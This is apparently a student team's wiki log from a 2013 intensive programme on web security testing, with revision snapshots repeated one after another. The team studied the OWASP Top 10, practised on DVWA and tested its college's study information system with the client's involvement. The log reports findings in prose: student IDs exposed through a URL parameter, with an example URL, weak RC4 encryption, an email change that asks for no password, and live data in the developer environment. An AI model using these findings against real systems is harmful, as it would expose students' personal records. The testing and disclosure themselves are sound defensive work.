** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)

* '''Day summarisation:'''
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]

* '''Security teamwork (whiteboard):'''
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)

* '''Virtual Machines (VM VirtualBox .ova files):
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]

* '''Final presentation of the project to the clients (4 April 2013)'''
** [[Media:2013_security_final_presentation.pdf|Presentation slides]] ''(Made by whole team, structure by Sandra and Jurij)''
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360] ''(Team Security starts from 18:30)''

* '''Final documentation'''
** Can be found in Google Drive (link will be here soon).

==Results==
Summary of what we did and solution what we developed

===Personal input===
====Sten Aus====
* '''What I did:'''
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).

* '''What I learned:'''
** How to do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.
** I learned how big value "same day feedback and summarisation" has.
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).

====Matis Palm====
* '''What I did:'''
** Helped teaching Apache & Linux & DVWA to other participants (due to having some experience already from before).
** Helping with sumorobot programming (Being from the robotics club).
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.

* ''' What I learned:'''
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).

====Sandra Suviste====
* '''What I did:'''
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).
** Practised attacks on the DVWA.
** Went through the OWASP ASVS document for possible shortcomings of the SIS.
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.
** Documented my own and others' work.
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]).

* '''What I learned:'''
** A lot about web application vulnerabilities - from my own research & practice and from others' presentations and teachers' lectures.
** Became more experienced in working in a multinational group with English as the working language.
** I learned how to document my work in order to keep track of the work of the team.
** I also learned what are the issues connected to the preparing of and giving a presentation with several (>3) presenters.

====Markus Rintamäki====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).
** Different attacks on SIS, changing user ids, SQL injection and XSS.
** Tried to upload a picture (for a lecturer) infected with malicious .php code.
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.
** We made the presentation structure together.
** Googeled a lot :)

* '''What I learned:'''
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.
** Basic attack methods in DVWA: SQL injection, XSS and CSRF.
** What is SIS and how does it works?
** I also learned to program sumorobots, more about Linux and Wireshark.
** And also of course I learned to speak english more fluently. :)

====Tomas Lepistö====
* '''What I did:'''
** Tried to find out possible security holes from OIS site.
** Tested different attacking methods with DVWA
** SQL-injection tests into various places on OIS site.
** Tested some XSS methods
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).
** Prepared our presentation with other group members
** Spoke in daily summary
** Studied a lot of information to know what is hacking about?

* '''What i learned:'''
** I learned how to use SQL-injection, XSS, Brute force, CSRF
** I learned also how to use Kali,Backtrack,Temper data, DVWA
** Working in international group
** How important documentation is
** Found out how important it is to make web-application secure

====Mika Salmela====
* '''What I did:'''
** I studied hacking methods
** Tried some hacking methods with DVWA
** Iscanned website, try to find if there is some security risks
** Tried some SQL and XSS injections
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|(A6 - Sensitive Data Exposure]]).

* '''What I learned:'''
** More than basics of how to hack?
** The most common hacking methods and how to use them.
** How to do SQL and XSS injections
** Basics of hacking tools
** How to find security risks
** How to work in international team.
** Learned much about what these are: DVWA, OWASP and ASVS.

====Kęstutis Tautvydas====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).
** Searched for security holes in OIS student information site.
** Used DVWA tool to test sql injections and xss scripting.
** Tried some sql injections and xss scripting on OIS page
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates
** Prepared some slides for the main presentation

* '''What have I learned:'''
** Theory about OWASP TOP 10 threats
** How to do sql injections
** How to use Firefox tamperdata tool
** How to do cross-site scripting
** Completely understood what is use case and how to draw them
** How to monitor activities with Wireshark
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8

====Jurij Lukjančikov====
* '''What I did:'''
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])
** I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])
** XSS and injection attacks to SIS

* '''What have I learned:'''
** I have learned about security breaches on the web.
** I have tried different parts of web for vulnerabilities and injection.
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).

===Final documentation===
====Analysis====

====Solution====

==IP Feedback==
===Feedback from Sten Aus===
I liked IP very much. It was very mindopening experience and definitely I am going to suggest this to my friends, so they can participate next time. I think that it is very good to participate in multicultural group, where all the participants are from different countries.
I did not like that we had to sit so much in lectures. :) And from time to time it was hard to understand the meaning of lecture, I could not link it to our project. But I think it will come to me after a few days, months or years, as a lot in this life - you don't know the purpose yet, but you will find it out in the future.

I enjoyed food a lot, it was a good choice to take lunches and dinners from Rahva Toit. :) Also, the pricing was good.

===Feedback from Matis Palm===

===Feedback from Sandra Suviste===

===Feedback from Markus Rintamäki===

===Feedback from Tomas Lepistö===

===Feedback from Mika Salmela===

===Feedback from Kęstutis Tautvydas===

===Feedback from Jurij Lukjančikov===

Security

2013-04-05T08:24:45Z

Saus: /* Feedback from Sten Aus */

Team page for [[Deploying IT Infrastructure Solutions]].

==Team Members==
*Sten Aus, Estonian Information Technology College
*Matis Palm, Estonian Information Technology College
*Sandra Suviste, Estonian Information Technology College
*Markus Rintamäki, Vaasa University of Applied Sciences
*Tomas Lepistö, Vaasa University of Applied Sciences
*Mika Salmela, Vaasa University of Applied Sciences
*Kęstutis Tautvydas, Vilnius University of Applied Sciences
*Jurij Lukjančikov, Vilnius University of Applied Sciences

==Goal==
*OWASP top 10
*HACK DVWA
*BackTrack, SamuraiCD (Last year experience)
*Scanning and testing tools - Qualys SSL Labs
*Acunetix Web Vulnerability Scanner v.8
*SubGraph Vega
*BEAST attack
*RC4

==Activity==
===Monday - 25.03.13===
'''Things what we did that day:'''
* Lectures
* Sumorobot programming
* Dinner @ St Patricks

===Tuesday - 26.03.13===
'''Things what we did that day:'''
* Documentation!
A1 Injection - Sandra 

A2 Broken Authentication and Session Management (was formerly A3) - Kestutis 

A3 Cross-Site Scripting (XSS) (was formerly A2) - Kestutis 

A4 Insecure Direct Object References - Markus 

A5 Security Misconfiguration (was formerly A6)- Tomas 

A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - Mika 

A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - Sten 

A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - Matis 

A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - Jurij 

A10 Unvalidated Redirects and Forwards - Sten 

'''Problems what we faced:'''
* Still need to get everyone a VM with DVWA running

'''Things what we plan to do:'''
* Copy Paste documentation tasks to Wiki :)
* Divide OWASP tasks

===Wednesday - 27.03.13===
'''Things what we did that day:'''
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti's presentation and Wireshark.
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)

'''Problems what we faced:'''
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it's nothing.

'''Things what we plan to do:'''
* Estonian members are going to study last year's report and going to make a short overview to other members about it.
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher's side as well, because teachers have a little more access than students (grades, information about student etc).
* In demo environment we are going to test new functions (what haven't been included in main environment, yet) - as there's some new functionality.

===Thursday - 28.03.13===
'''Things what we did that day:'''
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])
* Discussed the schedule and to-do list for next days
* Discussed some potential vulnerabilities of SIS
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.
* Prepared software for testing (Backtrack, Kali)

'''Problems what we faced:'''
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line ("Start here and go this way"), we will just need to start and see what we will find.

'''Things what we plan to do:'''
* Find attack examples for the vulnerabilities
* Try them out on DVWA
* Get familiar with Tamper Data, Kali and Backtrack
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS
* See how to get authentication info from POST and GET

'''Security threat of a day'''
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What's more -> developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!

===Friday - 29.03.13===
'''Things what we did that day:'''
* Learned how to perform attacks. We learned different attack methods and tried them out.
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.
* Talked about last year's experience. Tried if most of the security holes are patched or not.

'''Problems what we faced:'''
* We need student access to developer environment
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)

'''Things what we plan to do:'''
* Analysis of the results needs to be done
* Learn a little bit more about attacks
* Create some attacks
* Start to test simpler attacks to SIS

'''Security threats of the day:'''
* One can see other student's exam plan just by chaning student_id value in the URL (you don't need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to "My data" and just change ID from the URL again.
''For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322''

===Saturday - 30.03.13===
'''Things what we did that day:'''
* Visiting Tallinn TV Tower
* Visitinig The Seaplane Harbour

===Sunday - 31.03.13===
'''Free day'''

===Monday - 01.04.13===
'''NB! April fools' day!''' Beware!

'''Things what we did that day:'''
* We analyzed student information fields in "My data" section
* We test different sections and tried to change user IDs - luckily these are safe now.
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!
* Tried reflected XSS, most SIS areas escape "bad characters" out from input boxes.
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons ''(for example: other person taking exams claiming he/she is someone he/she is not)''

'''Problems what we faced:'''
* Still no new declaration etc opened for us. Maybe tomorrow?

'''Things what we plan to do:'''
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don't have much time left.
* Go deeper with different attacks and methods.

'''Security threat's of the day:'''
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user's cookies and then grant access to attacker.
* There's no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.
* Calendar: there's no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.
* There are some developer's notes left in different SIS parts (not only in developer environment).

===Tuesday - 02.04.13===
'''Things what we did that day:'''
* Visiting Skype office.
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.
* SIS is using a field called "security_key_sis_global". This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person's name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on "Forgot my password".

'''Problems what we faced:'''
* Really would have liked to have more time to test.

'''Things what we plan to do:'''
* Prepare and rehearse the presentation
* Look further into the e-mail modification issue.
* Finalise ASVS review

===Wednesday - 03.04.13===
'''Things what we did that day:'''
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to "audience".
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.

'''Problems what we faced:'''
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.

'''Things what we plan to do:'''
* We want to review and rehearse our final presentation.
* Update our documentation in Wiki.
* Upload and link presentations to persons and fill gaps in documentation.

===Thursday - 04.04.13===
'''Things what we did that day:'''
* Dress rehearsal. Updated presentation according to feedback and capabilities.
* Updated documentation to Wiki and uploaded missing presentations.
* Personal input section filling in Wiki.
* Went bowling. :)

'''Problems what we faced:'''
* Sometimes one minute feels like it is not a minute. :)

'''Things what we plan to do:'''
* Final documentation (link to Google docs).
* IP feedback
* Summarisation

===Friday - 05.04.13===
'''Things what we did that day:'''
* Discussion about today's plans.
* Upgraded and linked final documentation from Google Drive (aka Google Docs) (link can be found in Materials[[#Materials_.28slides_etc.29]] section and [[#Final documentation]] section).
* Every member wrote a feedback to Wiki page
* Every member wrote a feedback according to requirements of the Intensive Programme (Erasmus feedback)
* IP summarisation.
* Farewell party at St. Patrick's.

'''Problems what we faced:'''

'''Things what we plan to do:'''
* Farewell party, sleep well and start trip to home! :)

===Saturday - 06.04.13===
'''Departure! Bye bye!'''

==Materials (slides etc)==
* '''Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother'''
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)

* '''Day summarisation:'''
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]

* '''Security teamwork (whiteboard):'''
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)

* '''Virtual Machines (VM VirtualBox .ova files):
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]

* '''Final presentation of the project to the clients (4 April 2013)'''
** [[Media:2013_security_final_presentation.pdf|Presentation slides]] ''(Made by whole team, structure by Sandra and Jurij)''
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360] ''(Team Security starts from 18:30)''

* '''Final documentation'''
** Can be found in Google Drive (link will be here soon).

==Results==
Summary of what we did and solution what we developed

===Personal input===
====Sten Aus====
* '''What I did:'''
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).

* '''What I learned:'''
** How to do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.
** I learned how big value "same day feedback and summarisation" has.
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).

====Matis Palm====
* '''What I did:'''
** Helped teaching Apache & Linux & DVWA to other participants (due to having some experience already from before).
** Helping with sumorobot programming (Being from the robotics club).
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.

* ''' What I learned:'''
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).

====Sandra Suviste====
* '''What I did:'''
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).
** Practised attacks on the DVWA.
** Went through the OWASP ASVS document for possible shortcomings of the SIS.
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.
** Documented my own and others' work.
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]).

* '''What I learned:'''
** A lot about web application vulnerabilities - from my own research & practice and from others' presentations and teachers' lectures.
** Became more experienced in working in a multinational group with English as the working language.
** I learned how to document my work in order to keep track of the work of the team.
** I also learned what are the issues connected to the preparing of and giving a presentation with several (>3) presenters.

====Markus Rintamäki====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).
** Different attacks on SIS, changing user ids, SQL injection and XSS.
** Tried to upload a picture (for a lecturer) infected with malicious .php code.
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.
** We made the presentation structure together.
** Googeled a lot :)

* '''What I learned:'''
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.
** Basic attack methods in DVWA: SQL injection, XSS and CSRF.
** What is SIS and how does it works?
** I also learned to program sumorobots, more about Linux and Wireshark.
** And also of course I learned to speak english more fluently. :)

====Tomas Lepistö====
* '''What I did:'''
** Tried to find out possible security holes from OIS site.
** Tested different attacking methods with DVWA
** SQL-injection tests into various places on OIS site.
** Tested some XSS methods
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).
** Prepared our presentation with other group members
** Spoke in daily summary
** Studied a lot of information to know what is hacking about?

* '''What i learned:'''
** I learned how to use SQL-injection, XSS, Brute force, CSRF
** I learned also how to use Kali,Backtrack,Temper data, DVWA
** Working in international group
** How important documentation is
** Found out how important it is to make web-application secure

====Mika Salmela====
* '''What I did:'''
** I studied hacking methods
** Tried some hacking methods with DVWA
** Iscanned website, try to find if there is some security risks
** Tried some SQL and XSS injections
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|(A6 - Sensitive Data Exposure]]).

* '''What I learned:'''
** More than basics of how to hack?
** The most common hacking methods and how to use them.
** How to do SQL and XSS injections
** Basics of hacking tools
** How to find security risks
** How to work in international team.
** Learned much about what these are: DVWA, OWASP and ASVS.

====Kęstutis Tautvydas====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).
** Searched for security holes in OIS student information site.
** Used DVWA tool to test sql injections and xss scripting.
** Tried some sql injections and xss scripting on OIS page
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates
** Prepared some slides for the main presentation

* '''What have I learned:'''
** Theory about OWASP TOP 10 threats
** How to do sql injections
** How to use Firefox tamperdata tool
** How to do cross-site scripting
** Completely understood what is use case and how to draw them
** How to monitor activities with Wireshark
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8

====Jurij Lukjančikov====
* '''What I did:'''
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])
** I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])
** XSS and injection attacks to SIS

* '''What have I learned:'''
** I have learned about security breaches on the web.
** I have tried different parts of web for vulnerabilities and injection.
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).

===Final documentation===
====Analysis====

====Solution====

==IP Feed-back==
===Feedback from Sten Aus===
I liked IP very much. It was very mindopening experience and definitely I am going to suggest this to my friends, so they can participate next time. I think that it is very good to participate in multicultural group, where all the participants are from different countries.
I did not like that we had to sit so much in lectures. :) And from time to time it was hard to understand the meaning of lecture, I could not link it to our project. But I think it will come to me after a few days, months or years, as a lot in this life - you don't know the purpose yet, but you will find it out in the future.

I enjoyed food a lot, it was a good choice to take lunches and dinners from Rahva Toit. :) Also, the pricing was good.

===Feedback from Matis Palm===

===Feedback from Sandra Suviste===

===Feedback from Markus Rintamäki===

===Feedback from Tomas Lepistö===

===Feedback from Mika Salmela===

===Feedback from Kęstutis Tautvydas===

===Feedback from Jurij Lukjančikov===

Security

2013-04-05T07:05:30Z

Saus: /* Materials (slides etc) */

Team page for [[Deploying IT Infrastructure Solutions]].

==Team Members==
*Sten Aus, Estonian Information Technology College
*Matis Palm, Estonian Information Technology College
*Sandra Suviste, Estonian Information Technology College
*Markus Rintamäki, Vaasa University of Applied Sciences
*Tomas Lepistö, Vaasa University of Applied Sciences
*Mika Salmela, Vaasa University of Applied Sciences
*Kęstutis Tautvydas, Vilnius University of Applied Sciences
*Jurij Lukjančikov, Vilnius University of Applied Sciences

==Goal==
*OWASP top 10
*HACK DVWA
*BackTrack, SamuraiCD (Last year experience)
*Scanning and testing tools - Qualys SSL Labs
*Acunetix Web Vulnerability Scanner v.8
*SubGraph Vega
*BEAST attack
*RC4

==Activity==
===Monday - 25.03.13===
'''Things what we did that day:'''
* Lectures
* Sumorobot programming
* Dinner @ St Patricks

===Tuesday - 26.03.13===
'''Things what we did that day:'''
* Documentation!
A1 Injection - Sandra 

A2 Broken Authentication and Session Management (was formerly A3) - Kestutis 

A3 Cross-Site Scripting (XSS) (was formerly A2) - Kestutis 

A4 Insecure Direct Object References - Markus 

A5 Security Misconfiguration (was formerly A6)- Tomas 

A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - Mika 

A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - Sten 

A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - Matis 

A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - Jurij 

A10 Unvalidated Redirects and Forwards - Sten 

'''Problems what we faced:'''
* Still need to get everyone a VM with DVWA running

'''Things what we plan to do:'''
* Copy Paste documentation tasks to Wiki :)
* Divide OWASP tasks

===Wednesday - 27.03.13===
'''Things what we did that day:'''
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti's presentation and Wireshark.
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)

'''Problems what we faced:'''
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it's nothing.

'''Things what we plan to do:'''
* Estonian members are going to study last year's report and going to make a short overview to other members about it.
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher's side as well, because teachers have a little more access than students (grades, information about student etc).
* In demo environment we are going to test new functions (what haven't been included in main environment, yet) - as there's some new functionality.

===Thursday - 28.03.13===
'''Things what we did that day:'''
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])
* Discussed the schedule and to-do list for next days
* Discussed some potential vulnerabilities of SIS
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.
* Prepared software for testing (Backtrack, Kali)

'''Problems what we faced:'''
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line ("Start here and go this way"), we will just need to start and see what we will find.

'''Things what we plan to do:'''
* Find attack examples for the vulnerabilities
* Try them out on DVWA
* Get familiar with Tamper Data, Kali and Backtrack
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS
* See how to get authentication info from POST and GET

'''Security threat of a day'''
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What's more -> developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!

===Friday - 29.03.13===
'''Things what we did that day:'''
* Learned how to perform attacks. We learned different attack methods and tried them out.
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.
* Talked about last year's experience. Tried if most of the security holes are patched or not.

'''Problems what we faced:'''
* We need student access to developer environment
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)

'''Things what we plan to do:'''
* Analysis of the results needs to be done
* Learn a little bit more about attacks
* Create some attacks
* Start to test simpler attacks to SIS

'''Security threats of the day:'''
* One can see other student's exam plan just by chaning student_id value in the URL (you don't need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to "My data" and just change ID from the URL again.
''For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322''

===Saturday - 30.03.13===
'''Things what we did that day:'''
* Visiting Tallinn TV Tower
* Visitinig The Seaplane Harbour

===Sunday - 31.03.13===
'''Free day'''

===Monday - 01.04.13===
'''NB! April fools' day!''' Beware!

'''Things what we did that day:'''
* We analyzed student information fields in "My data" section
* We test different sections and tried to change user IDs - luckily these are safe now.
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!
* Tried reflected XSS, most SIS areas escape "bad characters" out from input boxes.
